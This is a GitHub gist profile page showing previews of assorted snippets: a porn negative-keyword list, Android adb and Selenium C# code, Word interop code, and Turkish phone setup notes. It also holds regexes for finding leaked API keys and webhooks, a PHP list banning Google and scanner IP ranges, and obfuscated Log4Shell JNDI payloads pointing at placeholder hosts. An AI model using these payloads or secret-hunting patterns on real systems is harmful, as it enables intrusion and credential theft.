Skip to content

Instantly share code, notes, and snippets.

View witchfindertr's full-sized avatar
🏠
Germany

witchfindertr

🏠
Germany
  • london
View GitHub Profile
@witchfindertr
witchfindertr / negative-keywords-porn.js
Created May 18, 2022 23:04 — forked from jonathonbyrdziak/negative-keywords-porn.js
Giant List of Negative Porn Keywords To Exclude From Google Adwords
// Giant List of Negative Porn Keywords To Exclude From Google Adwords
adult film
adult movie
adult video
anal
ass
bara
barely legal
bdsm
bestiality
https://www.shodan.io/search?query=http.favicon.hash%3A116323821
Samsung internet ve samsung internet beta indir
Sonra netblocker indir
Uygulama ozelliklerine gir samsung internetin
Izinleri bildirimleri ve arkaplan etkinligini kapat
Beta icin de aynisini yap
Ve chrome icin de
Netblockere gir
Block all aps yap
Sonra chrome , beta ve normal samsung int e izin ver
Ardından netblockeri on yap
https://doctorcodetutorial.blogspot.com/2020/08/make-instagram-clone-app-using-flutter.html?fbclid=IwAR2-BB0SyomU_NI2Nn7EIdVRrlF7wzjIpeQHH0ShTMlwEYKSBzAGy-DM7a0
var adbyol = Application.StartupPath + @"\dosya\telefon\adb.exe";
//UÇAK MODU AÇMA
System.Diagnostics.Process process = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo stratInfo = new System.Diagnostics.ProcessStartInfo();
stratInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
stratInfo.FileName = adbyol;
stratInfo.Arguments = @"shell am start -a android.settings.AIRPLANE_MODE_SETTINGS";
process.StartInfo = stratInfo;
process.Start();
Thread.Sleep(2000);
https?://[\\w\-\.]\\.file.core.windows.net' # AZURE STORAGE
'https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}' # SLACK WEBHOOK
"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}[\'\"\\\s][0-9a-f]{32}[\'\"\\\s]" # FACEBOOK OAUTH"
"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}[\'\"\\s][0-9a-zA-Z]{35,44}[\'\"\\\s]" # Twitter OAUTH
"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" # Heroku api
"key-[0-9a-zA-Z]{32}" # Mailgun API
"[0-9a-f]{32}-us[0-9]{1,2}" # Mail champ API
"sk_live_[0-9a-z]{32}" # Picatic API
"[0-9(+-[0-9A-Za-z_]{32}.apps.qooqleusercontent.com"
<?
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*",
"^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*",
"^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*",
"^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*",
"^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*",
"^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*",
"^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*",
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
ChromeOptions myOptions = new ChromeOptions();
//---------------------------//
var myProxy = new Proxy();
myProxy.HttpProxy = "localhost:80";
myOptions.Proxy = myProxy;
//---------------------------//
myOptions.AddArgument("--user-agent=Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25");
IWebDriver driver = new ChromeDriver(myOptions);
@witchfindertr
witchfindertr / gist:0e2f5d1197a4d91b77c3c1ea83603ecb
Created November 17, 2021 22:13
word replace and remove hyperlinks
// Get the Word application object.
Microsoft.Office.Interop.Word._Application word_app = new Microsoft.Office.Interop.Word.Application();
// Make Word visible (optional).
word_app.Visible = false;
// Open the Word document.
object missing = Type.Missing;
object filename = @"C:\Users\rssmonster\source\repos\egitimhane2\egitimhane2\bin\Debug\nnn.docx";